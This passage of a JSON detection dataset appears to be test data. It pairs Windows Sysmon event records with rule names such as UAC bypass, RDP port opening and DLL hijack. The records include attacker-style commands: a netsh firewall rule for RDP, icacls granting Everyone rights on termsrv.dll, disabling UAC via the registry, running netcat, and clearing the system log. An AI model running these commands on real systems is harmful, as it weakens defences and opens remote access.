20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port Opening"],"event":{"Event":{"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution_attributes":{"ProcessID":812,"ThreadID":3916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-30 10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution_attributes":{"ProcessID":1956,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution_attributes":{"ProcessID":1780,"ThreadID":2204},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office Security Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution_attributes":{"ProcessID":2024,"ThreadID":1212},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Fax Service DLL Search Order Hijack"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution_attributes":{"ProcessID":3200,"ThreadID":3596},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT 